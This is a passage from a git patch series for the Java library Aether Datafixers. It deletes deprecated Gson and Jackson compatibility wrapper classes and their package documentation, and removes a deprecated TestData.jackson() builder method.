- * import de.splatgames.aether.datafixers.codec.gson.GsonOps;
- *
- * // New import (recommended)
- * import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
- * }
- *
- *
Code Changes
- *
No code changes are required beyond updating imports. The API is identical:
- *
{@code
- * // This code works with both old and new imports
- * GsonOps ops = GsonOps.INSTANCE;
- * Dynamic dynamic = new Dynamic<>(ops, jsonElement);
- * }
- *
- *
Deprecation Timeline
- *
- *
Deprecation and Removal Schedule
- *
Version
Status
Action Required
- *
0.4.0
Deprecated
Update imports to new package; old code continues to work
- *
0.5.0
Deprecated
Warnings during compilation; functionality unchanged
- *
1.0.0
Removed
Package deleted; migration required before upgrade
- *
- *
- *
Why This Change?
- *
The package reorganization in version 0.4.0 introduced a cleaner, more scalable structure:
- *
- *
Format-Based Organization: All JSON implementations are now grouped under
- * {@code codec.json.*}, YAML under {@code codec.yaml.*}, etc.
- *
Library-Based Subpackages: Each format has subpackages for different
- * libraries (e.g., {@code json.gson}, {@code json.jackson})
- *
Consistent Naming: The new structure makes it easier to find and choose
- * the right implementation for your needs
The deprecated {@link de.splatgames.aether.datafixers.codec.gson.GsonOps} class uses the
- * delegation pattern to forward all method calls to the new
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} implementation. This ensures:
- *
- *
Identical behavior between deprecated and new implementations
- *
Bug fixes applied to the new implementation automatically benefit deprecated users
- *
No performance overhead beyond a single method delegation
- *
- *
- *
Thread Safety
- *
All classes in this deprecated package maintain the same thread-safety guarantees as their
- * replacements. The singleton {@link de.splatgames.aether.datafixers.codec.gson.GsonOps#INSTANCE}
- * can be safely shared across multiple threads.
- *
- * @author Erik Pförtner
- * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
- * @see de.splatgames.aether.datafixers.codec.json
- * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use classes from {@link de.splatgames.aether.datafixers.codec.json.gson}
- * instead. This package will be removed in version 1.0.0.
- */
-@Deprecated(since = "0.4.0", forRemoval = true)
-package de.splatgames.aether.datafixers.codec.gson;
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java
deleted file mode 100644
index 886fdaf..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java
+++ /dev/null
@@ -1,767 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-package de.splatgames.aether.datafixers.codec.jackson;
-
-import com.fasterxml.jackson.databind.JsonNode;
-import com.fasterxml.jackson.databind.ObjectMapper;
-import com.fasterxml.jackson.databind.node.ArrayNode;
-import com.fasterxml.jackson.databind.node.NullNode;
-import com.fasterxml.jackson.databind.node.ObjectNode;
-import com.google.common.base.Preconditions;
-import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
-import de.splatgames.aether.datafixers.api.result.DataResult;
-import de.splatgames.aether.datafixers.api.util.Pair;
-import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
-import org.jetbrains.annotations.NotNull;
-import org.jetbrains.annotations.Nullable;
-
-import java.util.stream.Stream;
-
-/**
- * Backwards-compatibility wrapper for {@link JacksonJsonOps}.
- *
- *
This class provides API compatibility for code written against the pre-0.4.0 package structure.
- * It delegates all operations to the new {@link JacksonJsonOps} implementation in the reorganized
- * package hierarchy.
- *
- *
Migration Guide
- *
To migrate to the new API, update your imports and class references:
This class is scheduled for removal in version 1.0.0. All functionality remains
- * fully operational until removal, but users should migrate to the new package structure
- * and class name at their earliest convenience.
- *
- *
Delegation Pattern
- *
This wrapper implements the delegation pattern, forwarding all method calls to the
- * underlying {@link JacksonJsonOps} instance. This ensures identical behavior between
- * the deprecated and new implementations.
- *
- *
Thread Safety
- *
This class is thread-safe. The singleton {@link #INSTANCE} can be safely shared
- * across multiple threads, as the underlying implementation is also thread-safe.
- * Custom instances created with a custom {@link ObjectMapper} are thread-safe if
- * the provided mapper is thread-safe.
- *
- * @author Erik Pförtner
- * @see JacksonJsonOps
- * @see DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use {@link JacksonJsonOps} from the {@code codec.json.jackson}
- * package instead. This class will be removed in version 1.0.0 as part of
- * the package reorganization.
- */
-@Deprecated(forRemoval = true, since = "0.4.0")
-public class JacksonOps implements DynamicOps {
-
- /**
- * The singleton instance of the deprecated {@code JacksonOps} wrapper.
- *
- *
This instance wraps {@link JacksonJsonOps#INSTANCE} and provides full backwards
- * compatibility. It uses a default {@link ObjectMapper} with standard configuration.
- * The instance is thread-safe and can be shared across the entire application.
- *
- * @deprecated Use {@link JacksonJsonOps#INSTANCE} instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- public static final JacksonOps INSTANCE = new JacksonOps(JacksonJsonOps.INSTANCE);
-
- /**
- * The underlying {@link JacksonJsonOps} instance to which all operations are delegated.
- *
- *
This field holds the actual implementation that performs all DynamicOps operations.
- * The wrapper simply forwards all method calls to this instance, ensuring behavioral
- * equivalence between the deprecated and new implementations.
- */
- private final JacksonJsonOps baseOps;
-
- /**
- * Creates a new deprecated {@code JacksonOps} wrapper delegating to the specified base implementation.
- *
- *
This constructor allows wrapping any {@link JacksonJsonOps} instance, enabling use
- * of custom configurations while maintaining backwards compatibility.
- *
- *
Usage
- *
{@code
- * // Typically use the singleton instead
- * JacksonOps ops = JacksonOps.INSTANCE;
- *
- * // Or wrap a custom JacksonJsonOps instance
- * JacksonJsonOps customJsonOps = new JacksonJsonOps(customMapper);
- * JacksonOps customOps = new JacksonOps(customJsonOps);
- * }
- *
- * @param baseOps the base {@link JacksonJsonOps} instance to delegate all operations to;
- * must not be {@code null}
- * @deprecated Use {@link JacksonJsonOps} directly instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- private JacksonOps(@NotNull final JacksonJsonOps baseOps) {
- Preconditions.checkNotNull(baseOps, "baseOps must not be null");
- this.baseOps = baseOps;
- }
-
- /**
- * Creates a new deprecated {@code JacksonOps} with the specified {@link ObjectMapper}.
- *
- *
This constructor provides backwards compatibility for code that creates custom
- * {@code JacksonOps} instances with a specific mapper configuration.
- *
- *
Usage
- *
{@code
- * // Old usage (deprecated)
- * ObjectMapper customMapper = new ObjectMapper()
- * .configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);
- * JacksonOps customOps = new JacksonOps(customMapper);
- *
- * // New usage (recommended)
- * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
- * }
- *
- * @param mapper the {@link ObjectMapper} to use for JSON operations; must not be {@code null}
- * @deprecated Use {@link JacksonJsonOps#JacksonJsonOps(ObjectMapper)} instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- public JacksonOps(@NotNull final ObjectMapper mapper) {
- Preconditions.checkNotNull(mapper, "mapper must not be null");
- this.baseOps = new JacksonJsonOps(mapper);
- }
-
- /**
- * Returns the {@link ObjectMapper} used by this instance.
- *
- *
This method provides access to the underlying Jackson mapper, which can be
- * useful for advanced configuration or direct JSON serialization/deserialization.
- *
- * @return the {@link ObjectMapper} used by the underlying {@link JacksonJsonOps} instance
- * @deprecated Use {@link JacksonJsonOps#mapper()} instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- public ObjectMapper mapper() {
- return this.baseOps.mapper();
- }
-
- // ==================== Empty/Null Values ====================
-
- /**
- * {@inheritDoc}
- *
- *
Returns the canonical empty/null representation for Jackson JSON data,
- * which is {@link NullNode#getInstance()}. This delegates to the underlying
- * {@link JacksonJsonOps#empty()} method.
- *
- * @return {@link NullNode#getInstance()} representing the absence of a value
- */
- @NotNull
- @Override
- public JsonNode empty() {
- return this.baseOps.empty();
- }
-
- /**
- * {@inheritDoc}
- *
- *
Returns an empty JSON object ({@code {}}). This delegates to the underlying
- * {@link JacksonJsonOps#emptyMap()} method.
Checks whether the given JSON node is a map/object structure.
- * This delegates to the underlying {@link JacksonJsonOps#isMap(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is an {@link ObjectNode}, {@code false} otherwise
- */
- @Override
- public boolean isMap(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isMap(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON node is a list/array structure.
- * This delegates to the underlying {@link JacksonJsonOps#isList(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is an {@link ArrayNode}, {@code false} otherwise
- */
- @Override
- public boolean isList(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isList(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON node is a text/string node.
- * This delegates to the underlying {@link JacksonJsonOps#isString(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is a text node, {@code false} otherwise
- */
- @Override
- public boolean isString(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isString(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON node is a numeric node.
- * This delegates to the underlying {@link JacksonJsonOps#isNumber(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is a numeric node, {@code false} otherwise
- */
- @Override
- public boolean isNumber(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isNumber(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON node is a boolean node.
- * This delegates to the underlying {@link JacksonJsonOps#isBoolean(JsonNode)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @return {@code true} if the value is a boolean node, {@code false} otherwise
- */
- @Override
- public boolean isBoolean(@NotNull final JsonNode value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isBoolean(value);
- }
-
- // ==================== Primitive Creation ====================
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON text node from the given string value.
- * This delegates to the underlying {@link JacksonJsonOps#createString(String)} method.
- *
- * @param value the string value to wrap; must not be {@code null}
- * @return a new text node containing the string
- */
- @NotNull
- @Override
- public JsonNode createString(@NotNull final String value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.createString(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given integer value.
- * This delegates to the underlying {@link JacksonJsonOps#createInt(int)} method.
- *
- * @param value the integer value to wrap
- * @return a new int node containing the integer
- */
- @NotNull
- @Override
- public JsonNode createInt(final int value) {
- return this.baseOps.createInt(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given long value.
- * This delegates to the underlying {@link JacksonJsonOps#createLong(long)} method.
- *
- * @param value the long value to wrap
- * @return a new long node containing the long
- */
- @NotNull
- @Override
- public JsonNode createLong(final long value) {
- return this.baseOps.createLong(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given float value.
- * This delegates to the underlying {@link JacksonJsonOps#createFloat(float)} method.
- *
- * @param value the float value to wrap
- * @return a new float node containing the float
- */
- @NotNull
- @Override
- public JsonNode createFloat(final float value) {
- return this.baseOps.createFloat(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given double value.
- * This delegates to the underlying {@link JacksonJsonOps#createDouble(double)} method.
- *
- * @param value the double value to wrap
- * @return a new double node containing the double
- */
- @NotNull
- @Override
- public JsonNode createDouble(final double value) {
- return this.baseOps.createDouble(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given byte value.
- * Since JSON has no distinct byte type, the value is stored as a short node.
- * This delegates to the underlying {@link JacksonJsonOps#createByte(byte)} method.
- *
- * @param value the byte value to wrap
- * @return a new short node containing the byte value
- */
- @NotNull
- @Override
- public JsonNode createByte(final byte value) {
- return this.baseOps.createByte(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given short value.
- * This delegates to the underlying {@link JacksonJsonOps#createShort(short)} method.
- *
- * @param value the short value to wrap
- * @return a new short node containing the short
- */
- @NotNull
- @Override
- public JsonNode createShort(final short value) {
- return this.baseOps.createShort(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON boolean node from the given boolean value.
- * This delegates to the underlying {@link JacksonJsonOps#createBoolean(boolean)} method.
- *
- * @param value the boolean value to wrap
- * @return a new boolean node containing the boolean
- */
- @NotNull
- @Override
- public JsonNode createBoolean(final boolean value) {
- return this.baseOps.createBoolean(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric node from the given {@link Number} value.
- * The specific numeric type is preserved in the underlying JSON representation.
- * This delegates to the underlying {@link JacksonJsonOps#createNumeric(Number)} method.
- *
- * @param value the number value to wrap; must not be {@code null}
- * @return a new numeric node containing the number
- */
- @NotNull
- @Override
- public JsonNode createNumeric(@NotNull final Number value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.createNumeric(value);
- }
-
- // ==================== Primitive Reading ====================
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the string value from a JSON node. The node must be a text node.
- * This delegates to the underlying {@link JacksonJsonOps#getStringValue(JsonNode)} method.
- *
- * @param input the JSON node to extract the string from; must not be {@code null}
- * @return a {@link DataResult} containing the string value on success,
- * or an error if the node is not a text node
- */
- @NotNull
- @Override
- public DataResult getStringValue(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getStringValue(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the numeric value from a JSON node. The node must be a numeric node.
- * This delegates to the underlying {@link JacksonJsonOps#getNumberValue(JsonNode)} method.
- *
- * @param input the JSON node to extract the number from; must not be {@code null}
- * @return a {@link DataResult} containing the {@link Number} value on success,
- * or an error if the node is not a numeric node
- */
- @NotNull
- @Override
- public DataResult getNumberValue(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getNumberValue(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the boolean value from a JSON node. The node must be a boolean node.
- * This delegates to the underlying {@link JacksonJsonOps#getBooleanValue(JsonNode)} method.
- *
- * @param input the JSON node to extract the boolean from; must not be {@code null}
- * @return a {@link DataResult} containing the boolean value on success,
- * or an error if the node is not a boolean node
- */
- @NotNull
- @Override
- public DataResult getBooleanValue(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getBooleanValue(input);
- }
-
- // ==================== List Operations ====================
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON array node from a stream of JSON nodes.
- * This delegates to the underlying {@link JacksonJsonOps#createList(Stream)} method.
- *
- * @param values the stream of JSON nodes to include in the array; must not be {@code null}
- * @return a new {@link ArrayNode} containing all elements from the stream
- */
- @NotNull
- @Override
- public JsonNode createList(@NotNull final Stream values) {
- Preconditions.checkNotNull(values, "values must not be null");
- return this.baseOps.createList(values);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the elements of a JSON array as a stream. The input must be an
- * {@link ArrayNode}. This delegates to the underlying
- * {@link JacksonJsonOps#getList(JsonNode)} method.
- *
- * @param input the JSON node to extract list elements from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of the array elements on success,
- * or an error if the input is not an array node
- */
- @NotNull
- @Override
- public DataResult> getList(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getList(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON array by appending a value to an existing array.
- * The original array is not modified; a deep copy is created.
- * This delegates to the underlying
- * {@link JacksonJsonOps#mergeToList(JsonNode, JsonNode)} method.
- *
- * @param list the existing JSON array to append to; must not be {@code null}
- * @param value the JSON node to append; must not be {@code null}
- * @return a {@link DataResult} containing the new array with the appended value on success,
- * or an error if the list is not an array node
- */
- @NotNull
- @Override
- public DataResult mergeToList(@NotNull final JsonNode list, @NotNull final JsonNode value) {
- Preconditions.checkNotNull(list, "list must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToList(list, value);
- }
-
- // ==================== Map Operations ====================
-
- /**
- * {@inheritDoc}
- *
- *
Retrieves the value associated with a key from a JSON object.
- * This delegates to the underlying {@link JacksonJsonOps#get(JsonNode, String)} method.
- *
- * @param value the JSON object to retrieve from; must not be {@code null}
- * @param key the key to look up; must not be {@code null}
- * @return the JSON node associated with the key, or {@code null} if not present
- * or if the input is not an object node
- */
- @Override
- public @Nullable JsonNode get(@NotNull final JsonNode value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.get(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object with a field set to the specified value.
- * If the input is an object node, a deep copy is created with the field updated.
- * If the input is not an object node, a new object is created containing only the specified field.
- * This delegates to the underlying
- * {@link JacksonJsonOps#set(JsonNode, String, JsonNode)} method.
- *
- * @param value the JSON node to modify; must not be {@code null}
- * @param key the key for the field to set; must not be {@code null}
- * @param newValue the value to associate with the key; must not be {@code null}
- * @return a new {@link ObjectNode} with the field set to the specified value
- */
- @NotNull
- @Override
- public JsonNode set(@NotNull final JsonNode value, @NotNull final String key, @NotNull final JsonNode newValue) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.set(value, key, newValue);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object with a field removed.
- * A deep copy of the input object is created without the specified field.
- * This delegates to the underlying
- * {@link JacksonJsonOps#remove(JsonNode, String)} method.
- *
- * @param value the JSON object to modify; must not be {@code null}
- * @param key the key of the field to remove; must not be {@code null}
- * @return a new {@link ObjectNode} without the specified field
- */
- @NotNull
- @Override
- public JsonNode remove(@NotNull final JsonNode value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.remove(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether a JSON object contains a field with the specified key.
- * This delegates to the underlying
- * {@link JacksonJsonOps#has(JsonNode, String)} method.
- *
- * @param value the JSON node to check; must not be {@code null}
- * @param key the key to look for; must not be {@code null}
- * @return {@code true} if the value is an {@link ObjectNode} and contains the specified key,
- * {@code false} otherwise
- */
- @Override
- public boolean has(@NotNull final JsonNode value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.has(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON object from a stream of key-value pairs.
- * Keys must be text nodes; non-text keys are skipped.
- * This delegates to the underlying {@link JacksonJsonOps#createMap(Stream)} method.
- *
- * @param entries the stream of key-value pairs; must not be {@code null}
- * @return a new {@link ObjectNode} containing all valid entries from the stream
- */
- @NotNull
- @Override
- public JsonNode createMap(@NotNull final Stream> entries) {
- Preconditions.checkNotNull(entries, "entries must not be null");
- return this.baseOps.createMap(entries);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the entries of a JSON object as a stream of key-value pairs.
- * This delegates to the underlying
- * {@link JacksonJsonOps#getMapEntries(JsonNode)} method.
- *
- * @param input the JSON node to extract entries from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of key-value pairs on success,
- * or an error if the input is not an object node
- */
- @NotNull
- @Override
- public DataResult>> getMapEntries(@NotNull final JsonNode input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getMapEntries(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object by adding a key-value pair to an existing map.
- * A deep copy of the input map is created with the new entry added.
- * This delegates to the underlying
- * {@link JacksonJsonOps#mergeToMap(JsonNode, JsonNode, JsonNode)} method.
- *
- * @param map the existing JSON object; must not be {@code null}
- * @param key the key for the new entry (must be a text node); must not be {@code null}
- * @param value the value for the new entry; must not be {@code null}
- * @return a {@link DataResult} containing the new object with the added entry on success,
- * or an error if the map is not an object node or the key is not a text node
- */
- @NotNull
- @Override
- public DataResult mergeToMap(@NotNull final JsonNode map, @NotNull final JsonNode key, @NotNull final JsonNode value) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToMap(map, key, value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object by merging two maps together.
- * A deep copy of the first map is created, and all entries from the second map are added.
- * Entries in the second map override entries with the same key in the first map.
- * This delegates to the underlying
- * {@link JacksonJsonOps#mergeToMap(JsonNode, JsonNode)} method.
- *
- * @param map the base JSON object; must not be {@code null}
- * @param other the JSON object to merge from; must not be {@code null}
- * @return a {@link DataResult} containing the merged object on success,
- * or an error if either argument is not an object node
- */
- @NotNull
- @Override
- public DataResult mergeToMap(@NotNull final JsonNode map, @NotNull final JsonNode other) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(other, "other must not be null");
- return this.baseOps.mergeToMap(map, other);
- }
-
- // ==================== Conversion ====================
-
- /**
- * {@inheritDoc}
- *
- *
Converts data from another {@link DynamicOps} format to Jackson's {@link JsonNode}.
- * Recursively converts primitives, lists, and maps to their Jackson equivalents.
- * This delegates to the underlying
- * {@link JacksonJsonOps#convertTo(DynamicOps, Object)} method.
- *
- * @param the type parameter of the target format
- * @param ops the target {@link DynamicOps} implementation; must not be {@code null}
- * @param input the data to convert in the source format; must not be {@code null}
- * @return the converted data as a Jackson {@link JsonNode}
- */
- @NotNull
- @Override
- public JsonNode convertTo(@NotNull final DynamicOps ops, @NotNull final U input) {
- Preconditions.checkNotNull(ops, "ops must not be null");
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.convertTo(ops, input);
- }
-
- /**
- * Returns a string representation of this deprecated wrapper.
- *
- *
The returned string clearly indicates that this is a deprecated wrapper
- * class and suggests using the new implementation instead.
- *
- * @return a descriptive string indicating deprecated status and the recommended alternative
- */
- @Override
- public String toString() {
- return "JacksonOps (deprecated, use JacksonJsonOps)";
- }
-}
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java
deleted file mode 100644
index 73a5b8f..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java
+++ /dev/null
@@ -1,135 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-/**
- * DEPRECATED: Legacy package for Jackson-based {@link de.splatgames.aether.datafixers.api.dynamic.DynamicOps}
- * implementation. This package is retained only for backwards compatibility and will be removed in version 1.0.0.
- *
- *
This package contains the original {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps} class
- * from the pre-0.4.0 package structure. All classes in this package are deprecated and delegate to their
- * replacements in the reorganized {@link de.splatgames.aether.datafixers.codec.json.jackson} package.
- *
- *
Migration Guide
- *
To migrate from this deprecated package to the new package structure:
- *
- *
Import Changes
- *
{@code
- * // Old imports (deprecated, will be removed in 1.0.0)
- * import de.splatgames.aether.datafixers.codec.jackson.JacksonOps;
- *
- * // New imports (recommended)
- * import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
- * }
- *
- *
Code Changes
- *
The class has been renamed from {@code JacksonOps} to {@code JacksonJsonOps} for clarity:
- *
{@code
- * // Old code (deprecated)
- * JacksonOps ops = JacksonOps.INSTANCE;
- * JacksonOps customOps = new JacksonOps(customMapper);
- * Dynamic dynamic = new Dynamic<>(ops, jsonNode);
- *
- * // New code (recommended)
- * JacksonJsonOps ops = JacksonJsonOps.INSTANCE;
- * JacksonJsonOps customOps = new JacksonJsonOps(customMapper);
- * Dynamic dynamic = new Dynamic<>(ops, jsonNode);
- * }
- *
- *
Deprecation Timeline
- *
- *
Deprecation and Removal Schedule
- *
Version
Status
Action Required
- *
0.4.0
Deprecated
Update imports and class names; old code continues to work
- *
0.5.0
Deprecated
Warnings during compilation; functionality unchanged
- *
1.0.0
Removed
Package deleted; migration required before upgrade
- *
- *
- *
Why This Change?
- *
The package reorganization in version 0.4.0 introduced a cleaner, more scalable structure:
- *
- *
Format-Based Organization: All JSON implementations are now grouped under
- * {@code codec.json.*}, YAML under {@code codec.yaml.*}, etc.
- *
Library-Based Subpackages: Each format has subpackages for different
- * libraries (e.g., {@code json.gson}, {@code json.jackson})
- *
Disambiguated Naming: {@code JacksonOps} is now {@code JacksonJsonOps} to
- * distinguish it from {@code JacksonYamlOps}, {@code JacksonTomlOps}, and {@code JacksonXmlOps}
The deprecated {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps} class uses the
- * delegation pattern to forward all method calls to the new
- * {@link de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps} implementation. This ensures:
- *
- *
Identical behavior between deprecated and new implementations
- *
Bug fixes applied to the new implementation automatically benefit deprecated users
- *
No performance overhead beyond a single method delegation
- *
- *
- *
Thread Safety
- *
All classes in this deprecated package maintain the same thread-safety guarantees as their
- * replacements. The singleton {@link de.splatgames.aether.datafixers.codec.jackson.JacksonOps#INSTANCE}
- * can be safely shared across multiple threads. Custom instances created with a custom
- * {@link com.fasterxml.jackson.databind.ObjectMapper} are thread-safe if the provided mapper is thread-safe.
- *
- * @author Erik Pförtner
- * @see de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps
- * @see de.splatgames.aether.datafixers.codec.json
- * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use classes from {@link de.splatgames.aether.datafixers.codec.json.jackson}
- * instead. This package will be removed in version 1.0.0.
- */
-@Deprecated(since = "0.4.0", forRemoval = true)
-package de.splatgames.aether.datafixers.codec.jackson;
diff --git a/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java b/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java
index f67c78b..e5acf4c 100644
--- a/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java
+++ b/aether-datafixers-testkit/src/main/java/de/splatgames/aether/datafixers/testkit/TestData.java
@@ -139,21 +139,6 @@ public static TestDataBuilder gson() {
return new TestDataBuilder<>(GsonOps.INSTANCE);
}
- /**
- * Creates a builder using {@link JacksonJsonOps}.
- *
- *
Use this when testing with Jackson's JSON representation.
- *
- * @return a new {@link TestDataBuilder} for Jackson JSON
- * @deprecated Since 0.5.0. Use {@link #jacksonJson()} instead for explicit format naming.
- * This method will be removed in version 1.0.0.
- */
- @Deprecated(forRemoval = true, since = "0.5.0")
- @NotNull
- public static TestDataBuilder jackson() {
- return jacksonJson();
- }
-
/**
* Creates a builder using {@link JacksonJsonOps}.
*
From 501923e6887f5533f7650db4b533c612164db227 Mon Sep 17 00:00:00 2001
From: Erik
Date: Sun, 18 Jan 2026 12:48:25 +0100
Subject: [PATCH 03/39] Removed deprecated `TestData.jackson()` in favor of
`TestData.jacksonJson()` and update references accordingly.
---
aether-datafixers-testkit/pom.xml | 2 +-
.../aether/datafixers/testkit/TestDataTest.java | 11 -----------
docs/appendix/glossary.md | 2 +-
docs/testkit/test-data-builders.md | 2 --
4 files changed, 2 insertions(+), 15 deletions(-)
